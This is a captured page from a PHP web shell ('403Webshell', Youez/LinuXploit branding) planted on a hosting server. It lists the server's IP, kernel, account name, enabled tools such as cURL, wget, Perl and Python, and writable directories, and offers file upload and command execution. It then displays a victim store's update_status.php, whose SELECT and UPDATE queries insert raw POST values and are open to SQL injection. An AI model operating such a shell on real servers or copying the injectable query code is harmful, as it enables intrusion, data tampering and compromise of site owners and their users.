403Webshell
Server IP : 162.0.215.10  /  Your IP : 3.16.50.172
Web Server : LiteSpeed
System : Linux premium181.web-hosting.com 4.18.0-513.24.1.lve.1.el8.x86_64 #1 SMP Thu May 9 15:10:09 UTC 2024 x86_64
User : alfhgysd ( 724)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/alfhgysd/gadett-qa.store/controlPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/alfhgysd/gadett-qa.store/controlPanel/update_status.php
<?php
include "master.php";

 $id = $_POST['cat_id'];
 $status = $_POST['status'];

 $sql = "Select * from subclasses where id = $id";
 $rs = $db->dbQuery($sql);
 $row = $db->dbFetchRecord($rs);
 $sql = "UPDATE `subclasses` SET `statuss` = '$status' WHERE `subclasses`.`id` = $id";
 $rs = $db->dbQuery($sql);


 ?>
<div id="snackbar" class="">تم التعديل بنجاح</div>

Youez - 2016 - github.com/yon3zu
LinuXploit